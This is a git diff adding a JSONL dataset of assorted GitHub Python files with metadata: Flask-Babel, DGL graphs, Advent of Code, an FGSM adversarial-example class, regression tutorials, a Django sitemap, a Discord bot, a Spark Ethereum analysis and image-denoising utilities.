diff --git "a/1133.jsonl" "b/1133.jsonl"
new file mode 100644--- /dev/null
+++ "b/1133.jsonl"
@@ -0,0 +1,1149 @@
+{"seq_id": "7492094436", "text": "from flask import Flask, render_template,request\nfrom flask_babel import Babel, _\n\napp = Flask(__name__)\napp.config['BABEL_DEFAULT_LOCALE'] = 'zh'\nbabel = Babel(app)\n\n\n@babel.localeselector\ndef get_locale():\n return request.accept_languages.best_match(['zh', 'en'])\n\n\n@app.route('/')\ndef hello():\n day = _(\"Saturday\")\n\n return render_template('index.html', day=day)\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n\n\"\"\"\n代码汇总:\n\n1、新建babel.cfg:\n[python: **.py]\n[jinja2: **/templates/**.html]\nextensions=jinja2.ext.autoescape,jinja2.ext.with_\n2、生成编译模板\npybabel extract -F babel.cfg -o messages.pot .\n3、翻译\npybabel init -i messages.pot -d translations -l zh_Hans-CN\n4、手动输入中文\nmessages.mo\n5、编译翻译结果\npybabel compile -d translations\n6、更新翻译\npybabel update -i messages.pot -d translations\n\"\"\"", "repo_name": "ddxygq/PyCode", "sub_path": "web/flask/hello-babel/hello.py", "file_name": "hello.py", "file_ext": "py", "file_size_in_byte": 866, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 22, "dataset": "github-code", "pt": "31", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask_babel.Babel", "line_number": 6, "usage_type": "call"}, {"api_name": "flask.request.accept_languages.best_match", "line_number": 11, "usage_type": "call"}, {"api_name": "flask.request.accept_languages", "line_number": 11, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 11, "usage_type": "name"}, {"api_name": "flask_babel._", "line_number": 16, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "70506096727", "text": "import networkx as nx\nimport dgl\nimport torch as th\n\n# g_nx = nx.petersen_graph()\n# g_dgl = dgl.DGLGraph(g_nx)\n\nimport matplotlib.pyplot as plt\n# plt.subplot(121)\n# nx.draw(g_nx, with_labels=True)\n# plt.subplot(122)\n# nx.draw(g_dgl.to_networkx(), with_labels=True)\n\n# plt.show()\ng = dgl.DGLGraph()\ng.add_nodes(10)\n# A couple edges one-by-one\nfor i in range(1, 4):\n g.add_edge(i, 0)\n# A few more with a paired list\nsrc = list(range(5, 8)); dst = [1]*3\ng.add_edges(src, dst)\n# finish with a pair of tensors\nsrc = th.tensor([8, 9]); dst = th.tensor([0, 0])\ng.add_edges(src, dst)\n\nnx.draw(g.to_networkx(), with_labels=True)\nplt.show()\n\n", "repo_name": "ashishu007/pytorch-stuff", "sub_path": "dglstuff/dgl_ex2.py", "file_name": "dgl_ex2.py", "file_ext": "py", "file_size_in_byte": 635, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "dgl.DGLGraph", "line_number": 15, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 24, "usage_type": "call"}, {"api_name": "networkx.draw", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}]}
+{"seq_id": "38383583689", "text": "from collections import defaultdict\nfrom typing import Dict, List\n\nfrom aocpuzzle import AoCPuzzle\n\n\nclass Puzzle10(AoCPuzzle):\n def common(self, input_data: List[str]) -> None:\n self.adapters = list(map(int, input_data))\n self.max_rating = max(self.adapters)\n self.target_rating = self.max_rating + 3\n\n def part1(self) -> int:\n adapters = self.adapters[:]\n curr_rating = 0\n\n adapters_left = set()\n adapters_left.add(0)\n\n diff_1, diff_3 = 0, 0\n\n while len(adapters_left) > 0:\n rating = adapters_left.pop()\n\n for next_rating_option in [rating + idx for idx in range(1, 4)]:\n if next_rating_option in adapters:\n difference = next_rating_option - curr_rating\n curr_rating = next_rating_option\n\n if difference == 1:\n diff_1 += 1\n\n if difference == 3 or curr_rating + 3 == self.target_rating:\n diff_3 += 1\n\n adapters.remove(next_rating_option)\n adapters_left.add(next_rating_option)\n return diff_1 * diff_3\n\n def count_ways(self, curr_rating: int) -> int:\n if curr_rating in self.cache:\n return self.cache[curr_rating]\n\n if curr_rating == self.target_rating:\n return 1\n\n count = 0\n\n for next_rating in [a for a in self.adapters if 1 <= a - curr_rating <= 3]:\n count += self.count_ways(next_rating)\n\n self.cache[curr_rating] = count\n\n return count\n\n def part2(self) -> int:\n curr_rating = 0\n self.cache: Dict[int, int] = defaultdict(int)\n self.adapters = self.adapters[:] + [self.target_rating]\n\n return self.count_ways(curr_rating)\n\n def test_cases(self, input_data: List[str]) -> int:\n part1_tests_1 = ['16', '10', '15', '5', '1', '11', '7', '19', '6', '12', '4']\n part1_tests_2 = [\n '28', '33', '18', '42', '31', '14', '46', '20', '48', '47', '24', '23', '49',\n '45', '19', '38', '39', '11', '1', '32', '25', '35', '8', '17', '7', '9', '4',\n '2', '34', '10', '3',\n ]\n\n self.common(part1_tests_1)\n assert self.part1() == 28\n assert self.part2() == 8\n\n self.common(part1_tests_2)\n assert self.part1() == 220\n assert self.part2() == 19208\n\n self.common(input_data)\n assert self.part1() == 2775\n assert self.part2() == 518344341716992\n\n return 3\n", "repo_name": "cpallapolu/advent-of-code", "sub_path": "src/years/2020/10/solution.py", "file_name": "solution.py", "file_ext": "py", "file_size_in_byte": 2548, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "aocpuzzle.AoCPuzzle", "line_number": 7, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 8, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 58, "usage_type": "name"}, {"api_name": "collections.defaultdict", "line_number": 58, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 63, "usage_type": "name"}]}
+{"seq_id": "3604794266", "text": "import torch\nfrom torch.autograd import Variable\nimport torch.optim as optim\nimport torch.nn as nn\n\nclass FGSM(object):\n def __init__(self,model):\n self.model = model\n\n def get_loss(self,xi,label_or_target,TARGETED):\n criterion = nn.CrossEntropyLoss()\n output = self.model.predict(xi)\n #print(output, label_or_target)\n loss = criterion(output, label_or_target)\n #print(loss)\n #print(c.size(),modifier.size())\n return loss\n\n def i_fgsm(self, input_xi, label_or_target, eta, TARGETED=False):\n \n yi = Variable(label_or_target.cuda())\n x_adv = Variable(input_xi.cuda(), requires_grad=True)\n for it in range(10):\n error = self.get_loss(x_adv,yi,TARGETED)\n if (it)%1==0:\n print(error.item()) \n self.model.get_gradient(error)\n #print(gradient)\n x_adv.grad.sign_()\n if TARGETED:\n x_adv.data = x_adv.data - eta* x_adv.grad \n else:\n x_adv.data = x_adv.data + eta* x_adv.grad\n #x_adv = Variable(x_adv.data, requires_grad=True)\n #error.backward()\n return x_adv\n\n def fgsm(self, input_xi, label_or_target, eta, TARGETED=False):\n \n yi = Variable(label_or_target.cuda())\n x_adv = Variable(input_xi.cuda(), requires_grad=True)\n\n error = self.get_loss(x_adv,yi,TARGETED)\n print(error.item()) \n self.model.get_gradient(error)\n #print(gradient)\n x_adv.grad.sign_()\n if TARGETED:\n x_adv.data = x_adv.data - eta* x_adv.grad \n else:\n x_adv.data = x_adv.data + eta* x_adv.grad\n #x_adv = Variable(x_adv.data, requires_grad=True)\n #error.backward()\n return x_adv \n\n def __call__(self, input_xi, label_or_target, eta=0.01, TARGETED=False, ITERATIVE=False, epsilon=None):\n if ITERATIVE:\n adv = self.i_fgsm(input_xi, label_or_target, eta, TARGETED)\n else:\n eta = epsilon\n adv = self.fgsm(input_xi, label_or_target, eta, TARGETED)\n return adv \n \n \n", "repo_name": "cmhcbb/attackbox", "sub_path": "attack/FGSM.py", "file_name": "FGSM.py", "file_ext": "py", "file_size_in_byte": 2154, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 54, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torch.nn.CrossEntropyLoss", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "name"}, {"api_name": "torch.autograd.Variable", "line_number": 21, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.autograd.Variable", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "16101342768", "text": "'''\n多项式回归\n'''\n# 多项式回归: 如果数据实际上比简单的直线更复杂,依然可以使用线性模型来拟合非线性数据。\n# 一个简单的方法是对每个特征进行加权后作为新的特征,然后训练一个线性模型在这个扩展的\n# 特征集。\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\nm = 100\nX = 6 * np.random.rand(m, 1) - 3\ny = 0.5 * X**2 + X + 2 + np.random.randn(m, 1)\n\nplt.plot(X, y, \"b.\")\nplt.xlabel(\"$x_1$\", fontsize=18)\nplt.ylabel(\"$y$\", rotation=0, fontsize=18)\nplt.axis([-3, 3, 0, 10])\n\nfrom sklearn.preprocessing import PolynomialFeatures\n# 使用 Scikit-Learning 的 PolynomialFeatures 类进行训练数据集的转换,让训练集中每个\n# 特征的���方(2 次多项式)作为新特征。\npoly_features = PolynomialFeatures(degree=2, include_bias=False)\nX_poly = poly_features.fit_transform(X)\n\nprint(X_poly[0])\n\n# X_poly 现在包含原始特征并加上了这个特征的平方 。现在你可以在这个扩展训练集上\n# 使用 LinearRegression 模型进行拟合\n\nfrom sklearn.linear_model import LinearRegression\n\nlin_reg = LinearRegression()\nlin_reg.fit(X_poly, y)\nprint(lin_reg.intercept_, lin_reg.coef_)\n\nX_new=np.linspace(-3, 3, 100).reshape(100, 1)\nX_new_poly = poly_features.transform(X_new)\ny_new = lin_reg.predict(X_new_poly)\nplt.plot(X, y, \"b.\")\nplt.plot(X_new, y_new, \"r-\", linewidth=2, label=\"Predictions\")\nplt.xlabel(\"$x_1$\", fontsize=18)\nplt.ylabel(\"$y$\", rotation=0, fontsize=18)\nplt.legend(loc=\"upper left\", fontsize=14)\nplt.axis([-3, 3, 0, 10])\nplt.show()\n\n# 可以使用交叉验证来估计一个模型的泛化能力,另一种方法是观察学习曲线:画出模型在训练集上\n# 的表现,同时画出以训练集规模为自变量的训练集函数\n\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.model_selection import train_test_split\n\ndef plot_learning_curves(model, X, y):\n X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=0.2)\n train_errors, val_errors = [], []\n for m in range(1, len(X_train)):\n model.fit(X_train[:m], y_train[:m])\n y_train_predict = model.predict(X_train[:m])\n y_val_predict = model.predict(X_val)\n train_errors.append(mean_squared_error(y_train_predict, y_train[:m]))\n val_errors.append(mean_squared_error(y_val_predict, y_val))\n\n plt.xlabel(\"Training set size\", fontsize=18)\n plt.ylabel(\"RMSE\", rotation=0, fontsize=18)\n plt.plot(np.sqrt(train_errors), \"r-+\", linewidth=2, label=\"train\")\n plt.plot(np.sqrt(val_errors), \"b-\", linewidth=3, label=\"val\")\n\n\n# 简单线性回归模型的学习曲线\nlin_reg = LinearRegression()\nplot_learning_curves(lin_reg, X, y)\n\n# 上面的曲线表现了一个典型的欠拟合模型,两条曲线都到达高原地带并趋于稳定,并且最后\n# 两条曲线非常接近,同时误差值非常大。\n\nplt.show()\n\n# 在统计和机器学习领域有个重要的理论:一个模型的泛化误差由三个不同误差的和决\n# 定:\n# 偏差:泛化误差的这部分误差是由于错误的假设决定的。例如实际是一个二次模型,\n# 你却假设了一个线性模型。一个高偏差的模型最容易出现欠拟合。\n# 方差:这部分误差是由于模型对训练数据的微小变化较为敏感,一个多自由度的模\n# 型更容易有高的方差(例如一个高阶多项式模型),因此会导致模型过拟合。\n# 不可约误差:这部分误差是由于数据本身的噪声决定的。降低这部分误差的唯一方\n# 法就是进行数据清洗(例如:修复数据源,修复坏的传感器,识别和剔除异常值)。", "repo_name": "applepip/machine_learning", "sub_path": "model_training/Polynomial_model_training.py", "file_name": "Polynomial_model_training.py", "file_ext": "py", "file_size_in_byte": 3676, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.random.rand", "line_number": 12, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 12, "usage_type": "attribute"}, {"api_name": "numpy.random.randn", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 13, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.PolynomialFeatures", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 55, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 61, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 62, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 64, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 64, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 65, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 65, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 67, "usage_type": "call"}, {"api_name": "sklearn.linear_model.LinearRegression", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}]}
+{"seq_id": "543568971", "text": "from django.shortcuts import render\n\n\ndef list_children(page):\n html = '
{title} '.format(url=page.url, title=page.title)\n children = page.get_children().live().public().order_by('path')\n for child in children:\n html += list_children(child)\n html += ' '\n return html\n\n\ndef sitemap_view(request):\n root_page = request.site.root_page\n\n html = list_children(root_page)\n\n return render(request, 'sitemap.html', {'sitemap_html': html})\n", "repo_name": "City-of-Helsinki/digihel", "sub_path": "digi/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 497, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.shortcuts.render", "line_number": 18, "usage_type": "call"}]}
+{"seq_id": "69889118810", "text": "import discord\r\nimport random\r\nfrom discord.ext import commands\r\n\r\n\r\nintents = discord.Intents.default()\r\nintents.message_content = True\r\n\r\nbot = commands.Bot(command_prefix='!', intents=intents)\r\n\r\n@bot.event\r\nasync def on_ready():\r\n print(f'We have logged in as {bot.user}')\r\n\r\n@bot.command()\r\nasync def hello(ctx):\r\n await ctx.send(f'Привет! Я бот {bot.user}!')\r\n\r\n@bot.command(description='For when you wanna settle the score some other way')\r\nasync def choose(ctx, *choices: str):\r\n \"\"\"Chooses between multiple choices.\"\"\"\r\n await ctx.send(random.choice(choices))\r\n\r\n@bot.command()\r\nasync def heh(ctx, count_heh = 5):\r\n await ctx.send(\"he\" * count_heh)\r\n\r\n@bot.command()\r\nasync def joined(ctx, member: discord.Member):\r\n \"\"\"Says when a member joined.\"\"\"\r\n await ctx.send(f'{member.name} joined {discord.utils.format_dt(member.joined_at)}')\r\n\r\n@bot.command()\r\nasync def guess(ctx, count:int):\r\n answer = random.randint(1,10)\r\n if count == answer:\r\n await ctx.send('Right!')\r\n else:\r\n await ctx.send(f'Nah, no! The answer was {answer}.')\r\n\r\n@bot.command()\r\nasync def repeat(ctx, times: int, content='repeating...'):\r\n \"\"\"Repeats a message multiple times.\"\"\"\r\n for i in range(times):\r\n await ctx.send(content)\r\n\r\n\r\nbot.run(\"Token\")\r\n", "repo_name": "yernur0/DiscordBot2", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 1302, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "discord.Intents.default", "line_number": 6, "usage_type": "call"}, {"api_name": "discord.Intents", "line_number": 6, "usage_type": "attribute"}, {"api_name": "discord.ext.commands.Bot", "line_number": 9, "usage_type": "call"}, {"api_name": "discord.ext.commands", "line_number": 9, "usage_type": "name"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "discord.Member", "line_number": 29, "usage_type": "attribute"}, {"api_name": "discord.utils.format_dt", "line_number": 31, "usage_type": "call"}, {"api_name": "discord.utils", "line_number": 31, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}]}
+{"seq_id": "39093431822", "text": "import sys, string\nimport os\nimport socket\nimport time\nimport operator\nimport boto3\nimport json\nfrom pyspark.sql import SparkSession\nfrom datetime import datetime\nimport pyspark.sql.functions as F\n\nif __name__ == \"__main__\":\n\n spark = SparkSession\\\n .builder\\\n .appName(\"Ethereum\")\\\n .getOrCreate()\n\n def check_transactions(line):\n try:\n fields = line.split(',')\n if len(fields)!=15:\n return False\n \n float(fields[7])\n return True\n except:\n return False\n\n \n\n s3_data_repository_bucket = os.environ['DATA_REPOSITORY_BUCKET']\n\n s3_endpoint_url = os.environ['S3_ENDPOINT_URL']+':'+os.environ['BUCKET_PORT']\n s3_access_key_id = os.environ['AWS_ACCESS_KEY_ID']\n s3_secret_access_key = os.environ['AWS_SECRET_ACCESS_KEY']\n s3_bucket = os.environ['BUCKET_NAME']\n\n hadoopConf = spark.sparkContext._jsc.hadoopConfiguration()\n hadoopConf.set(\"fs.s3a.endpoint\", s3_endpoint_url)\n hadoopConf.set(\"fs.s3a.access.key\", s3_access_key_id)\n hadoopConf.set(\"fs.s3a.secret.key\", s3_secret_access_key)\n hadoopConf.set(\"fs.s3a.path.style.access\", \"true\")\n hadoopConf.set(\"fs.s3a.connection.ssl.enabled\", \"false\") \n \n \n \n transactions = spark.sparkContext.textFile(\"s3a://\" + s3_data_repository_bucket + \"/ECS765/ethereum-parvulus/transactions.csv\")\n trans = transactions.filter(check_transactions)\n \n trans_map = trans.map(lambda x: (x.split(',')[5], x.split(',')[6], x.split(',')[7], x.split(',')[11]))\n naming_columns = ['from_address', 'to_address', 'value',' timestamp']\n DataFrame = trans_map.toDF(naming_columns)\n df = DataFrame.filter(F.col('from_address') == F.col('to_address'))\n trans_rdd = df.rdd.map(lambda x: ((x[0],x[1]), float(x[2])))\n output = trans_rdd.reduceByKey(lambda x, y: x+y)\n top10 = output.takeOrdered(10, key = lambda x: -x[1])\n \n my_bucket_resource = boto3.resource('s3',\n endpoint_url='http://' + s3_endpoint_url,\n aws_access_key_id=s3_access_key_id,\n aws_secret_access_key=s3_secret_access_key)\n\n \n now = datetime.now() # current date and time\n date_time = now.strftime(\"%d-%m-%Y_%H:%M:%S\")\n \n my_result_object = my_bucket_resource.Object(s3_bucket,'ethereum_partd3_' + date_time + '/top10_washtrade.txt')\n my_result_object.put(Body=json.dumps(top10))\n\n \n spark.stop()\n", "repo_name": "sunrita007/Big-Data-Project", "sub_path": "Big Data CW 2/Part D/Wash Trading/wash_trading.py", "file_name": "wash_trading.py", "file_ext": "py", "file_size_in_byte": 2441, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pyspark.sql.SparkSession.builder.appName", "line_number": 14, "usage_type": "call"}, {"api_name": "pyspark.sql.SparkSession.builder", "line_number": 14, "usage_type": "attribute"}, {"api_name": "pyspark.sql.SparkSession", "line_number": 14, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 34, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 35, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 36, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 37, "usage_type": "attribute"}, {"api_name": "pyspark.sql.functions.col", "line_number": 54, "usage_type": "call"}, {"api_name": "pyspark.sql.functions", "line_number": 54, "usage_type": "name"}, {"api_name": "boto3.resource", "line_number": 59, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 65, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 65, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 69, "usage_type": "call"}]}
+{"seq_id": "39115231406", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nAdvent of code 2021, day x\nblackstream-x’ solution\n\"\"\"\n\n\nimport logging\n\nimport helpers\n\n\nSPAWN_PERIOD = 7\nNEW_FISH = 8\n\n\ndef spawn_days(initial_count, days):\n \"\"\"Days when a fish with initial_count spawns\"\"\"\n return range(initial_count + 1, days + 1, SPAWN_PERIOD)\n\n\ndef population_after(days, fishes):\n \"\"\"Return the population count after {days} days\"\"\"\n population = len(fishes)\n spawn_events = [None] + [0] * days\n for fish in fishes:\n for day in spawn_days(fish, days):\n spawn_events[day] += 1\n #\n #\n for day in range(1, days + 1):\n new_fish = spawn_events[day]\n logging.debug(\"Day #%s: %s spawned\", day, new_fish)\n population += new_fish\n for days_offset in spawn_days(NEW_FISH, days - day):\n spawn_events[day + days_offset] += new_fish\n #\n #\n return population\n\n\n@helpers.timer\ndef part1(reader):\n \"\"\"Part 1\"\"\"\n days = 80\n for line in reader.lines():\n fishes = [int(item) for item in line.split(\",\")]\n return population_after(days, fishes)\n #\n\n\n@helpers.timer\ndef part2(reader):\n \"\"\"Part 2\"\"\"\n days = 256\n for line in reader.lines():\n fishes = [int(item) for item in line.split(\",\")]\n return population_after(days, fishes)\n #\n\n\nif __name__ == \"__main__\":\n helpers.solve_puzzle(part1, part2)\n\n\n# vim: fileencoding=utf-8 sw=4 ts=4 sts=4 expandtab autoindent syntax=python:\n", "repo_name": "blackstream-x/advent-of-code2021", "sub_path": "solutions/day6.py", "file_name": "day6.py", "file_ext": "py", "file_size_in_byte": 1489, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "logging.debug", "line_number": 35, "usage_type": "call"}, {"api_name": "helpers.timer", "line_number": 44, "usage_type": "attribute"}, {"api_name": "helpers.timer", "line_number": 54, "usage_type": "attribute"}, {"api_name": "helpers.solve_puzzle", "line_number": 65, "usage_type": "call"}]}
+{"seq_id": "13711264148", "text": "import gc\nimport os\nimport sys\nimport numpy as np\nimport tensorflow as tf\nfrom PIL import Image\nimport random\n\n\nclass train_data():\n def __init__(self, filepath):\n self.filepath = filepath\n assert '.npy' in filepath\n if not os.path.exists(filepath):\n print(\"[!] Data file not exists\")\n sys.exit(1)\n\n def __enter__(self):\n print(\"[*] Loading data...\")\n self.data = np.load(self.filepath)\n np.random.shuffle(self.data)\n print(\"[*] Load successfully...\")\n return self.data\n\n def __exit__(self, type, value, trace):\n del self.data\n gc.collect()\n print(\"In __exit__()\")\n\n\ndef load_data(filepath):\n return train_data(filepath=filepath)\n\n\ndef load_images(filelist):\n if not isinstance(filelist, list):\n im = Image.open(filelist).convert('L')\n return np.array(im).reshape(1, im.size[1], im.size[0], 1)\n data = []\n for file in filelist:\n im = Image.open(file).convert('L')\n data.append(np.array(im).reshape(1, im.size[1], im.size[0], 1))\n return data\n\n\ndef save_images(filepath, ground_truth, noisy_image=None, clean_image=None):\n ground_truth = np.squeeze(ground_truth)\n noisy_image = np.squeeze(noisy_image)\n clean_image = np.squeeze(clean_image)\n if not clean_image.any():\n cat_image = ground_truth\n else:\n cat_image = np.concatenate([ground_truth, noisy_image, clean_image], axis=1)\n im = Image.fromarray(cat_image.astype('uint8')).convert('L')\n im.save(filepath, 'png')\n\n\ndef tf_psnr(im1, im2):\n mse = tf.losses.mean_squared_error(labels=im2 * 255.0, predictions=im1 * 255.0)\n psnr = 10.0 * (tf.log(255.0 ** 2 / mse) / tf.log(10.0))\n return psnr\n\n\ndef cal_psnr(im1, im2):\n mse = ((im1.astype(np.float) - im2.astype(np.float)) ** 2).mean()\n psnr = 10 * np.log10(255 ** 2 / mse)\n return psnr\n\n\ndef np_psnr(im1, im2):\n mse = (((im1.astype(np.float))*255.0 - (im2.astype(np.float))*255.0) ** 2).mean()\n psnr = 10 * np.log10(255 ** 2 / mse)\n return psnr\n\n\ndef np_mpsnr(img1, img2):\n mse = np.zeros(img1.shape[2])\n psnr = np.zeros(img1.shape[2])\n for i in range(img1.shape[2]):\n im1 = img1[:,:,i]\n im2 = img2[:,:,i]\n mse[i]= (((im1.astype(np.float))*255.0 - (im2.astype(np.float))*255.0) ** 2).mean()\n psnr[i] = 10 * np.log10(255 ** 2 / mse[i])\n return np.mean(psnr)\n\n\ndef salt_and_pepper_noise(img, proportion):\n noise_img =img\n height,width =noise_img.shape[0],noise_img.shape[1]\n num = int(height*width*proportion)\n for i in range(num):\n w = random.randint(0,width-1)\n h = random.randint(0,height-1)\n if random.randint(0,1) ==0:\n noise_img[h,w] = 0\n else:\n noise_img[h,w] = 1\n return noise_img", "repo_name": "lzz11834/SGIDN", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 2804, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.exists", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 21, "usage_type": "attribute"}, {"api_name": "gc.collect", "line_number": 27, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 37, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 37, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 38, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 41, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 41, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 48, "usage_type": "call"}, {"api_name": "numpy.squeeze", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 53, "usage_type": "call"}, {"api_name": "PIL.Image.fromarray", "line_number": 54, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 54, "usage_type": "name"}, {"api_name": "tensorflow.losses.mean_squared_error", "line_number": 59, "usage_type": "call"}, {"api_name": "tensorflow.losses", "line_number": 59, "usage_type": "attribute"}, {"api_name": "tensorflow.log", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.log10", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 71, "usage_type": "attribute"}, {"api_name": "numpy.log10", "line_number": 72, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 78, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.log10", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 84, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 92, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 93, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 94, "usage_type": "call"}]}
